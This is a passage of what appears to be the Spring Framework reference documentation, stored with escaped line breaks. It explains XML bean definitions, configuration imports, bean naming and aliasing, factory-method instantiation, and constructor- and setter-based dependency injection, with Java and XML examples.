id=\"accountDao\"\n\t\t\tclass=\"org.springframework.samples.jpetstore.dao.jpa.JpaAccountDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"itemDao\" class=\"org.springframework.samples.jpetstore.dao.jpa.JpaItemDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for data access objects go here -->\n\n\t<\/beans>\n----\n\nIn the preceding example, the service layer consists of the class `PetStoreServiceImpl`,\nand two data access objects of the type `JpaAccountDao` and `JpaItemDao` (based\non the JPA Object\/Relational mapping standard). The `property name` element refers to the\nname of the JavaBean property, and the `ref` element refers to the name of another bean\ndefinition. This linkage between `id` and `ref` elements expresses the dependency between\ncollaborating objects. For details of configuring an object's dependencies, see\n<<beans-dependencies,Dependencies>>.\n\n\n[[beans-factory-xml-import]]\n==== Composing XML-based configuration metadata\n\nIt can be useful to have bean definitions span multiple XML files. Often each individual\nXML configuration file represents a logical layer or module in your architecture.\n\nYou can use the application context constructor to load bean definitions from all these\nXML fragments. This constructor takes multiple `Resource` locations, as was shown in the\nprevious section. Alternatively, use one or more occurrences of the `<import\/>` element\nto load bean definitions from another file or files. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"services.xml\"\/>\n\t\t<import resource=\"resources\/messageSource.xml\"\/>\n\t\t<import resource=\"\/resources\/themeSource.xml\"\/>\n\n\t\t<bean id=\"bean1\" class=\"...\"\/>\n\t\t<bean id=\"bean2\" class=\"...\"\/>\n\t<\/beans>\n----\n\nIn the preceding example, external bean definitions are loaded from three files:\n`services.xml`, `messageSource.xml`, and `themeSource.xml`. All location paths are\nrelative to the definition file doing the importing, so `services.xml` must be in the\nsame directory or classpath location as the file doing the importing, while\n`messageSource.xml` and `themeSource.xml` must be in a `resources` location below the\nlocation of the importing file. As you can see, a leading slash is ignored, but given\nthat these paths are relative, it is better form not to use the slash at all. The\ncontents of the files being imported, including the top level `<beans\/>` element, must\nbe valid XML bean definitions according to the Spring Schema.\n\n[NOTE]\n====\nIt is possible, but not recommended, to reference files in parent directories using a\nrelative \"..\/\" path. Doing so creates a dependency on a file that is outside the current\napplication. In particular, this reference is not recommended for \"classpath:\" URLs (for\nexample, \"classpath:..\/services.xml\"), where the runtime resolution process chooses the\n\"nearest\" classpath root and then looks into its parent directory. Classpath\nconfiguration changes may lead to the choice of a different, incorrect directory.\n\nYou can always use fully qualified resource locations instead of relative paths: for\nexample, \"file:C:\/config\/services.xml\" or \"classpath:\/config\/services.xml\". However, be\naware that you are coupling your application's configuration to specific absolute\nlocations. It is generally preferable to keep an indirection for such absolute\nlocations, for example, through \"${...}\" placeholders that are resolved against JVM\nsystem properties at runtime.\n====\n\n\n\n[[beans-factory-client]]\n=== Using the container\n\nThe `ApplicationContext` is the interface for an advanced factory capable of maintaining\na registry of different beans and their dependencies. Using the method `T getBean(String\nname, Class<T> requiredType)` you can retrieve instances of your beans.\n\nThe `ApplicationContext` enables you to read bean definitions and access them as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ create and configure beans\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n\n\t\/\/ retrieve configured instance\n\tPetStoreService service = context.getBean(\"petStore\", PetStoreService.class);\n\n\t\/\/ use configured instance\n\tList<String> userList = service.getUsernameList();\n----\n\nYou use `getBean()` to retrieve instances of your beans. The `ApplicationContext`\ninterface has a few other methods for retrieving beans, but ideally your application\ncode should never use them. Indeed, your application code should have no calls to the\n`getBean()` method at all, and thus no dependency on Spring APIs at all. For example,\nSpring's integration with web frameworks provides for dependency injection for various\nweb framework classes such as controllers and JSF-managed beans.\n\n\n\n\n[[beans-definition]]\n== Bean overview\nA Spring IoC container manages one or more __beans__. These beans are created with the\nconfiguration metadata that you supply to the container, for example, in the form of XML\n`<bean\/>` definitions.\n\nWithin the container itself, these bean definitions are represented as `BeanDefinition`\nobjects, which contain (among other information) the following metadata:\n\n* __A package-qualified class name:__ typically the actual implementation class of the\n bean being defined.\n* Bean behavioral configuration elements, which state how the bean should behave in the\n container (scope, lifecycle callbacks, and so forth).\n* References to other beans that are needed for the bean to do its work; these\n references are also called __collaborators__ or __dependencies__.\n* Other configuration settings to set in the newly created object, for example, the\n number of connections to use in a bean that manages a connection pool, or the size\n limit of the pool.\n\nThis metadata translates to a set of properties that make up each bean definition.\n\n[[beans-factory-bean-definition-tbl]]\n.The bean definition\n|===\n| Property| Explained in...\n\n| class\n| <<beans-factory-class>>\n\n| name\n| <<beans-beanname>>\n\n| scope\n| <<beans-factory-scopes>>\n\n| constructor arguments\n| <<beans-factory-collaborators>>\n\n| properties\n| <<beans-factory-collaborators>>\n\n| autowiring mode\n| <<beans-factory-autowire>>\n\n| lazy-initialization mode\n| <<beans-factory-lazy-init>>\n\n| initialization method\n| <<beans-factory-lifecycle-initializingbean>>\n\n| destruction method\n| <<beans-factory-lifecycle-disposablebean>>\n|===\n\nIn addition to bean definitions that contain information on how to create a specific\nbean, the `ApplicationContext` implementations also permit the registration of existing\nobjects that are created outside the container, by users. This is done by accessing the\nApplicationContext's BeanFactory via the method `getBeanFactory()` which returns the\nBeanFactory implementation `DefaultListableBeanFactory`. `DefaultListableBeanFactory`\nsupports this registration through the methods `registerSingleton(..)` and\n`registerBeanDefinition(..)`. However, typical applications work solely with beans\ndefined through metadata bean definitions.\n\n[NOTE]\n====\nBean metadata and manually supplied singleton instances need to be registered as early\nas possible, in order for the container to properly reason about them during autowiring\nand other introspection steps. While overriding of existing metadata and existing\nsingleton instances is supported to some degree, the registration of new beans at\nruntime (concurrently with live access to factory) is not officially supported and may\nlead to concurrent access exceptions and\/or inconsistent state in the bean container.\n====\n\n\n\n[[beans-beanname]]\n=== Naming beans\n\nEvery bean has one or more identifiers. These identifiers must be unique within the\ncontainer that hosts the bean. A bean usually has only one identifier, but if it\nrequires more than one, the extra ones can be considered aliases.\n\nIn XML-based configuration metadata, you use the `id` and\/or `name` attributes\nto specify the bean identifier(s). The `id` attribute allows you to specify\nexactly one id. Conventionally these names are alphanumeric ('myBean',\n'fooService', etc.), but may contain special characters as well. If you want to\nintroduce other aliases to the bean, you can also specify them in the `name`\nattribute, separated by a comma (`,`), semicolon (`;`), or white space. As a\nhistorical note, in versions prior to Spring 3.1, the `id` attribute was\ndefined as an `xsd:ID` type, which constrained possible characters. As of 3.1,\nit is defined as an `xsd:string` type. Note that bean `id` uniqueness is still\nenforced by the container, though no longer by XML parsers.\n\nYou are not required to supply a name or id for a bean. If no name or id is supplied\nexplicitly, the container generates a unique name for that bean. However, if you want to\nrefer to that bean by name, through the use of the `ref` element or\n<<beans-servicelocator,Service Locator>> style lookup, you must provide a name.\nMotivations for not supplying a name are related to using <<beans-inner-beans,inner\nbeans>> and <<beans-factory-autowire,autowiring collaborators>>.\n\n.Bean Naming Conventions\n****\nThe convention is to use the standard Java convention for instance field names when\nnaming beans. That is, bean names start with a lowercase letter, and are camel-cased\nfrom then on. Examples of such names would be (without quotes) `'accountManager'`,\n`'accountService'`, `'userDao'`, `'loginController'`, and so forth.\n\nNaming beans consistently makes your configuration easier to read and understand, and if\nyou are using Spring AOP it helps a lot when applying advice to a set of beans related\nby name.\n****\n\n[NOTE]\n====\nWith component scanning in the classpath, Spring generates bean names for unnamed\ncomponents, following the rules above: essentially, taking the simple class name\nand turning its initial character to lower-case. However, in the (unusual) special\ncase when there is more than one character and both the first and second characters\nare upper case, the original casing gets preserved. These are the same rules as\ndefined by `java.beans.Introspector.decapitalize` (which Spring is using here).\n====\n\n\n[[beans-beanname-alias]]\n==== Aliasing a bean outside the bean definition\n\nIn a bean definition itself, you can supply more than one name for the bean, by using a\ncombination of up to one name specified by the `id` attribute, and any number of other\nnames in the `name` attribute. These names can be equivalent aliases to the same bean,\nand are useful for some situations, such as allowing each component in an application to\nrefer to a common dependency by using a bean name that is specific to that component\nitself.\n\nSpecifying all aliases where the bean is actually defined is not always adequate,\nhowever. It is sometimes desirable to introduce an alias for a bean that is defined\nelsewhere. This is commonly the case in large systems where configuration is split\namongst each subsystem, each subsystem having its own set of object definitions. In\nXML-based configuration metadata, you can use the `<alias\/>` element to accomplish this.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<alias name=\"fromName\" alias=\"toName\"\/>\n----\n\nIn this case, a bean in the same container which is named `fromName`, may also,\nafter the use of this alias definition, be referred to as `toName`.\n\nFor example, the configuration metadata for subsystem A may refer to a DataSource via\nthe name `subsystemA-dataSource`. The configuration metadata for subsystem B may refer to\na DataSource via the name `subsystemB-dataSource`. When composing the main application\nthat uses both these subsystems the main application refers to the DataSource via the\nname `myApp-dataSource`. To have all three names refer to the same object you add to the\nMyApp configuration metadata the following aliases definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<alias name=\"subsystemA-dataSource\" alias=\"subsystemB-dataSource\"\/>\n\t<alias name=\"subsystemA-dataSource\" alias=\"myApp-dataSource\" \/>\n----\n\nNow each component and the main application can refer to the dataSource through a name\nthat is unique and guaranteed not to clash with any other definition (effectively\ncreating a namespace), yet they refer to the same bean.\n\n.Java-configuration\n****\nIf you are using Java-configuration, the `@Bean` annotation can be used to provide aliases\nsee <<beans-java-bean-annotation>> for details.\n****\n\n[[beans-factory-class]]\n=== Instantiating beans\n\nA bean definition essentially is a recipe for creating one or more objects. The\ncontainer looks at the recipe for a named bean when asked, and uses the configuration\nmetadata encapsulated by that bean definition to create (or acquire) an actual object.\n\nIf you use XML-based configuration metadata, you specify the type (or class) of object\nthat is to be instantiated in the `class` attribute of the `<bean\/>` element. This\n`class` attribute, which internally is a `Class` property on a `BeanDefinition`\ninstance, is usually mandatory. (For exceptions, see\n<<beans-factory-class-instance-factory-method>> and <<beans-child-bean-definitions>>.)\nYou use the `Class` property in one of two ways:\n\n* Typically, to specify the bean class to be constructed in the case where the container\n itself directly creates the bean by calling its constructor reflectively, somewhat\n equivalent to Java code using the `new` operator.\n* To specify the actual class containing the `static` factory method that will be\n invoked to create the object, in the less common case where the container invokes a\n `static` __factory__ method on a class to create the bean. The object type returned\n from the invocation of the `static` factory method may be the same class or another\n class entirely.\n\n****\n.Inner class names\nIf you want to configure a bean definition for a `static` nested class, you have to use\nthe __binary__ name of the nested class.\n\nFor example, if you have a class called `Foo` in the `com.example` package, and this\n`Foo` class has a `static` nested class called `Bar`, the value of the `'class'`\nattribute on a bean definition would be...\n\n`com.example.Foo$Bar`\n\nNotice the use of the `$` character in the name to separate the nested class name from\nthe outer class name.\n****\n\n\n[[beans-factory-class-ctor]]\n==== Instantiation with a constructor\n\nWhen you create a bean by the constructor approach, all normal classes are usable by and\ncompatible with Spring. That is, the class being developed does not need to implement\nany specific interfaces or to be coded in a specific fashion. Simply specifying the bean\nclass should suffice. However, depending on what type of IoC you use for that specific\nbean, you may need a default (empty) constructor.\n\nThe Spring IoC container can manage virtually __any__ class you want it to manage; it is\nnot limited to managing true JavaBeans. Most Spring users prefer actual JavaBeans with\nonly a default (no-argument) constructor and appropriate setters and getters modeled\nafter the properties in the container. You can also have more exotic non-bean-style\nclasses in your container. If, for example, you need to use a legacy connection pool\nthat absolutely does not adhere to the JavaBean specification, Spring can manage it as\nwell.\n\nWith XML-based configuration metadata you can specify your bean class as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\"\/>\n\n\t<bean name=\"anotherExample\" class=\"examples.ExampleBeanTwo\"\/>\n----\n\nFor details about the mechanism for supplying arguments to the constructor (if required)\nand setting object instance properties after the object is constructed, see\n<<beans-factory-collaborators,Injecting Dependencies>>.\n\n\n[[beans-factory-class-static-factory-method]]\n==== Instantiation with a static factory method\n\nWhen defining a bean that you create with a static factory method, you use the `class`\nattribute to specify the class containing the `static` factory method and an attribute\nnamed `factory-method` to specify the name of the factory method itself. You should be\nable to call this method (with optional arguments as described later) and return a live\nobject, which subsequently is treated as if it had been created through a constructor.\nOne use for such a bean definition is to call `static` factories in legacy code.\n\nThe following bean definition specifies that the bean will be created by calling a\nfactory-method. The definition does not specify the type (class) of the returned object,\nonly the class containing the factory method. In this example, the `createInstance()`\nmethod must be a __static__ method.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"clientService\"\n\t\tclass=\"examples.ClientService\"\n\t\tfactory-method=\"createInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ClientService {\n\t\tprivate static ClientService clientService = new ClientService();\n\t\tprivate ClientService() {}\n\n\t\tpublic static ClientService createInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nFor details about the mechanism for supplying (optional) arguments to the factory method\nand setting object instance properties after the object is returned from the factory,\nsee <<beans-factory-properties-detailed,Dependencies and configuration in detail>>.\n\n\n[[beans-factory-class-instance-factory-method]]\n==== Instantiation using an instance factory method\n\nSimilar to instantiation through a <<beans-factory-class-static-factory-method,static\nfactory method>>, instantiation with an instance factory method invokes a non-static\nmethod of an existing bean from the container to create a new bean. To use this\nmechanism, leave the `class` attribute empty, and in the `factory-bean` attribute,\nspecify the name of a bean in the current (or parent\/ancestor) container that contains\nthe instance method that is to be invoked to create the object. Set the name of the\nfactory method itself with the `factory-method` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- the factory bean, which contains a method called createInstance() -->\n\t<bean id=\"serviceLocator\" class=\"examples.DefaultServiceLocator\">\n\t\t<!-- inject any dependencies required by this locator bean -->\n\t<\/bean>\n\n\t<!-- the bean to be created via the factory bean -->\n\t<bean id=\"clientService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createClientServiceInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultServiceLocator {\n\n\t\tprivate static ClientService clientService = new ClientServiceImpl();\n\t\tprivate DefaultServiceLocator() {}\n\n\t\tpublic ClientService createClientServiceInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nOne factory class can also hold more than one factory method as shown here:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"serviceLocator\" class=\"examples.DefaultServiceLocator\">\n\t\t<!-- inject any dependencies required by this locator bean -->\n\t<\/bean>\n\n\t<bean id=\"clientService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createClientServiceInstance\"\/>\n\n\t<bean id=\"accountService\"\n\t\tfactory-bean=\"serviceLocator\"\n\t\tfactory-method=\"createAccountServiceInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultServiceLocator {\n\n\t\tprivate static ClientService clientService = new ClientServiceImpl();\n\t\tprivate static AccountService accountService = new AccountServiceImpl();\n\n\t\tprivate DefaultServiceLocator() {}\n\n\t\tpublic ClientService createClientServiceInstance() {\n\t\t\treturn clientService;\n\t\t}\n\n\t\tpublic AccountService createAccountServiceInstance() {\n\t\t\treturn accountService;\n\t\t}\n\n\t}\n----\n\nThis approach shows that the factory bean itself can be managed and configured through\ndependency injection (DI). See <<beans-factory-properties-detailed,Dependencies and\nconfiguration in detail>>.\n\n[NOTE]\n====\nIn Spring documentation,__ factory bean__ refers to a bean that is configured in the\nSpring container that will create objects through an\n<<beans-factory-class-instance-factory-method,instance>> or\n<<beans-factory-class-static-factory-method,static>> factory method. By contrast,\n`FactoryBean` (notice the capitalization) refers to a Spring-specific\n<<beans-factory-extension-factorybean, `FactoryBean` >>.\n====\n\n\n\n\n[[beans-dependencies]]\n== Dependencies\nA typical enterprise application does not consist of a single object (or bean in the\nSpring parlance). Even the simplest application has a few objects that work together to\npresent what the end-user sees as a coherent application. This next section explains how\nyou go from defining a number of bean definitions that stand alone to a fully realized\napplication where objects collaborate to achieve a goal.\n\n\n\n[[beans-factory-collaborators]]\n=== Dependency Injection\n\n__Dependency injection__ (DI) is a process whereby objects define their dependencies,\nthat is, the other objects they work with, only through constructor arguments, arguments\nto a factory method, or properties that are set on the object instance after it is\nconstructed or returned from a factory method. The container then __injects__ those\ndependencies when it creates the bean. This process is fundamentally the inverse, hence\nthe name __Inversion of Control__ (IoC), of the bean itself controlling the instantiation\nor location of its dependencies on its own by using direct construction of classes, or\nthe __Service Locator__ pattern.\n\nCode is cleaner with the DI principle and decoupling is more effective when objects are\nprovided with their dependencies. The object does not look up its dependencies, and does\nnot know the location or class of the dependencies. As such, your classes become easier\nto test, in particular when the dependencies are on interfaces or abstract base classes,\nwhich allow for stub or mock implementations to be used in unit tests.\n\nDI exists in two major variants, <<beans-constructor-injection,Constructor-based\ndependency injection>> and <<beans-setter-injection,Setter-based dependency injection>>.\n\n\n[[beans-constructor-injection]]\n==== Constructor-based dependency injection\n\n__Constructor-based__ DI is accomplished by the container invoking a constructor with a\nnumber of arguments, each representing a dependency. Calling a `static` factory method\nwith specific arguments to construct the bean is nearly equivalent, and this discussion\ntreats arguments to a constructor and to a `static` factory method similarly. The\nfollowing example shows a class that can only be dependency-injected with constructor\ninjection. Notice that there is nothing __special__ about this class, it is a POJO that\nhas no dependencies on container specific interfaces, base classes or annotations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\t\/\/ the SimpleMovieLister has a dependency on a MovieFinder\n\t\tprivate MovieFinder movieFinder;\n\n\t\t\/\/ a constructor so that the Spring container can inject a MovieFinder\n\t\tpublic SimpleMovieLister(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ business logic that actually uses the injected MovieFinder is omitted...\n\n\t}\n----\n\n[[beans-factory-ctor-arguments-resolution]]\n===== Constructor argument resolution\n\nConstructor argument resolution matching occurs using the argument's type. If no\npotential ambiguity exists in the constructor arguments of a bean definition, then the\norder in which the constructor arguments are defined in a bean definition is the order\nin which those arguments are supplied to the appropriate constructor when the bean is\nbeing instantiated. Consider the following class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage x.y;\n\n\tpublic class Foo {\n\n\t\tpublic Foo(Bar bar, Baz baz) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNo potential ambiguity exists, assuming that `Bar` and `Baz` classes are not related by\ninheritance. Thus the following configuration works fine, and you do not need to specify\nthe constructor argument indexes and\/or types explicitly in the `<constructor-arg\/>`\nelement.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<constructor-arg ref=\"bar\"\/>\n\t\t\t<constructor-arg ref=\"baz\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\"\/>\n\n\t\t<bean id=\"baz\" class=\"x.y.Baz\"\/>\n\t<\/beans>\n----\n\nWhen another bean is referenced, the type is known, and matching can occur (as was the\ncase with the preceding example). When a simple type is used, such as\n`<value>true<\/value>`, Spring cannot determine the type of the value, and so cannot match\nby type without help. Consider the following class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage examples;\n\n\tpublic class ExampleBean {\n\n\t\t\/\/ Number of years to calculate the Ultimate Answer\n\t\tprivate int years;\n\n\t\t\/\/ The Answer to Life, the Universe, and Everything\n\t\tprivate String ultimateAnswer;\n\n\t\tpublic ExampleBean(int years, String ultimateAnswer) {\n\t\t\tthis.years = years;\n\t\t\tthis.ultimateAnswer = ultimateAnswer;\n\t\t}\n\n\t}\n----\n\n.[[beans-factory-ctor-arguments-type]]Constructor argument type matching\n--\nIn the preceding scenario, the container __can__ use type matching with simple types if\nyou explicitly specify the type of the constructor argument using the `type` attribute.\nFor example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg type=\"int\" value=\"7500000\"\/>\n\t\t<constructor-arg type=\"java.lang.String\" value=\"42\"\/>\n\t<\/bean>\n----\n--\n\n.[[beans-factory-ctor-arguments-index]]Constructor argument index\n--\nUse the `index` attribute to specify explicitly the index of constructor arguments. For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg index=\"0\" value=\"7500000\"\/>\n\t\t<constructor-arg index=\"1\" value=\"42\"\/>\n\t<\/bean>\n----\n\nIn addition to resolving the ambiguity of multiple simple values, specifying an index\nresolves ambiguity where a constructor has two arguments of the same type. Note that the\n__index is 0 based__.\n--\n\n.[[beans-factory-ctor-arguments-name]]Constructor argument name\n--\nYou can also use the constructor parameter name for value disambiguation:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg name=\"years\" value=\"7500000\"\/>\n\t\t<constructor-arg name=\"ultimateAnswer\" value=\"42\"\/>\n\t<\/bean>\n----\n\nKeep in mind that to make this work out of the box your code must be compiled with the\ndebug flag enabled so that Spring can look up the parameter name from the constructor.\nIf you can't compile your code with debug flag (or don't want to) you can use\nhttp:\/\/download.oracle.com\/javase\/6\/docs\/api\/java\/beans\/ConstructorProperties.html[@ConstructorProperties]\nJDK annotation to explicitly name your constructor arguments. The sample class would\nthen have to look as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage examples;\n\n\tpublic class ExampleBean {\n\n\t\t\/\/ Fields omitted\n\n\t\t@ConstructorProperties({\"years\", \"ultimateAnswer\"})\n\t\tpublic ExampleBean(int years, String ultimateAnswer) {\n\t\t\tthis.years = years;\n\t\t\tthis.ultimateAnswer = ultimateAnswer;\n\t\t}\n\n\t}\n----\n--\n\n\n[[beans-setter-injection]]\n==== Setter-based dependency injection\n\n__Setter-based__ DI is accomplished by the container calling setter methods on your\nbeans after invoking a no-argument constructor or no-argument `static` factory method to\ninstantiate your bean.\n\nThe following example shows a class that can only be dependency-injected using pure\nsetter injection. This class is conventional Java. It is a POJO that has no dependencies\non container specific interfaces, base classes or annotations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\t\/\/ the SimpleMovieLister has a dependency on the MovieFinder\n\t\tprivate MovieFinder movieFinder;\n\n\t\t\/\/ a setter method so that the Spring container can inject a MovieFinder\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ business logic that actually uses the injected MovieFinder is omitted...\n\n\t}\n----\n\nThe `ApplicationContext` supports constructor-based and setter-based DI for the beans it\nmanages. It also supports setter-based DI after some dependencies have already been\ninjected through the constructor approach. You configure the dependencies in the form of\na `BeanDefinition`, which you use in conjunction with `PropertyEditor` instances to\nconvert properties from one format to another. However, most Spring users do not work\nwith these classes directly (i.e., programmatically) but rather with XML `bean`\ndefinitions, annotated components (i.e., classes annotated with `@Component`,\n`@Controller`, etc.), or `@Bean` methods in Java-based `@Configuration` classes. These\nsources are then converted internally into instances of `BeanDefinition` and used to\nload an entire Spring IoC container instance.\n\n.Constructor-based or setter-based DI?\n****\nSince you can mix constructor-based and setter-based DI, it is a good rule of thumb to\nuse constructors for _mandatory dependencies_ and setter methods or configuration methods\nfor _optional dependencies_. Note that use of the <<beans-required-annotation,@Required>>\nannotation on a setter method can be used to make the property a required dependency.\n\nThe Spring team generally advocates constructor injection as it enables one to implement\napplication components as _immutable objects_ and to ensure that required dependencies\nare not `null`. Furthermore constructor-injected components are always returned to client\n(calling) code in a fully initialized state. As a side note, a large number of constructor\narguments is a _bad code smell_, implying that the class likely has too many\nresponsibilities and should be refactored to better address proper separation of concerns.\n\nSetter injection should primarily only be used for optional dependencies that can be\nassigned reasonable default values within the class. Otherwise, not-null checks must be\nperformed everywhere the code uses the dependency. One benefit of setter injection is that\nsetter methods make objects of that class amenable to reconfiguration or re-injection\nlater. Management through <<jmx,JMX MBeans>> is therefore a compelling use case for setter\ninjection.\n\nUse the DI style that makes the most sense for a particular class. Sometimes, when dealing\nwith third-party classes for which you do not have the source, the choice is made for you.\nFor example, if a third-party class does not expose any setter methods, then constructor\ninjection may be the only available form of DI.\n****\n\n\n[[beans-dependency-resolution]]\n==== Dependency resolution process\n\nThe container performs bean dependency resolution as follows:\n\n* The `ApplicationContext` is created and initialized with configuration metadata that\n describes all the beans. Configuration metadata can be specified via XML, Java code, or\n annotations.\n* For each bean, its dependencies are expressed in the form of properties, constructor\n arguments, or arguments to the static-factory method if you are using that instead of\n a normal constructor. These dependencies are provided to the bean, __when the bean is\n actually created__.\n* Each property or constructor argument is an actual definition of the value to set, or\n a reference to another bean in the container.\n* Each property or constructor argument which is a value is converted from its specified\n format to the actual type of that property or constructor argument. By default Spring\n can convert a value supplied in string format to all built-in types, such as `int`,\n `long`, `String`, `boolean`, etc.\n\nThe Spring container validates the configuration of each bean as the container is created.\nHowever, the bean properties themselves are not set until the bean __is actually created__.\nBeans that are singleton-scoped and set to be pre-instantiated (the default) are created\nwhen the container is created. Scopes are defined in <<beans-factory-scopes>>. Otherwise,\nthe bean is created only when it is requested. Creation of a bean potentially causes a\ngraph of beans to be created, as the bean's dependencies and its dependencies'\ndependencies (and so on) are created and assigned. Note that resolution mismatches among\nthose dependencies may show up late, i.e. on first creation of the affected bean.\n\n.Circular dependencies\n****\nIf you use predominantly constructor injection, it is possible to create an unresolvable\ncircular dependency scenario.\n\nFor example: Class A requires an instance of class B through constructor injection, and\nclass B requires an instance of class A through constructor injection. If you configure\nbeans for classes A and B to be injected into each other, the Spring IoC container\ndetects this circular reference at runtime, and throws a\n`BeanCurrentlyInCreationException`.\n\nOne possible solution is to edit the source code of some classes to be configured by\nsetters rather than constructors. Alternatively, avoid constructor injection and use\nsetter injection only. In other words, although it is not recommended, you can configure\ncircular dependencies with setter injection.\n\nUnlike the __typical__ case (with no circular dependencies), a circular dependency\nbetween bean A and bean B forces one of the beans to be injected into the other prior to\nbeing fully initialized itself (a classic chicken\/egg scenario).\n****\n\nYou can generally trust Spring to do the right thing. It detects configuration problems,\nsuch as references to non-existent beans and circular dependencies, at container\nload-time. Spring sets properties and resolves dependencies as late as possible, when\nthe bean is actually created. This means that a Spring container which has loaded\ncorrectly can later generate an exception when you request an object if there is a\nproblem creating that object or one of its dependencies. For example, the bean throws an\nexception as a result of a missing or invalid property. This potentially delayed\nvisibility of some configuration issues is why `ApplicationContext` implementations by\ndefault pre-instantiate singleton beans. At the cost of some upfront time and memory to\ncreate these beans before they are actually needed, you discover configuration issues\nwhen the `ApplicationContext` is created, not later. You can still override this default\nbehavior so that singleton beans will lazy-initialize, rather than be pre-instantiated.\n\nIf no circular dependencies exist, when one or more collaborating beans are being\ninjected into a dependent bean, each collaborating bean is __totally__ configured prior\nto being injected into the dependent bean. This means that if bean A has a dependency on\nbean B, the Spring IoC container completely configures bean B prior to invoking the\nsetter method on bean A. In other words, the bean is instantiated (if not a\npre-instantiated singleton), its dependencies are set, and the relevant lifecycle\nmethods (such as a <<beans-factory-lifecycle-initializingbean,configured init method>>\nor the <<beans-factory-lifecycle-initializingbean,InitializingBean callback method>>)\nare invoked.\n\n\n[[beans-some-examples]]\n==== Examples of dependency injection\n\nThe following example uses XML-based configuration metadata for setter-based DI. A small\npart of a Spring XML configuration file specifies some bean definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- setter injection using the nested ref element -->\n\t\t<property name=\"beanOne\">\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/property>\n\n\t\t<!-- setter injection using the neater ref attribute -->\n\t\t<property name=\"beanTwo\" ref=\"yetAnotherBean\"\/>\n\t\t<property name=\"integerProperty\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic void setBeanOne(AnotherBean beanOne) {\n\t\t\tthis.beanOne = beanOne;\n\t\t}\n\n\t\tpublic void setBeanTwo(YetAnotherBean beanTwo) {\n\t\t\tthis.beanTwo = beanTwo;\n\t\t}\n\n\t\tpublic void setIntegerProperty(int i) {\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nIn the preceding example, setters are declared to match against the properties specified\nin the XML file. The following example uses constructor-based DI:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- constructor injection using the nested ref element -->\n\t\t<constructor-arg>\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/constructor-arg>\n\n\t\t<!-- constructor injection using the neater ref attribute -->\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\n\t\t<constructor-arg type=\"int\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" 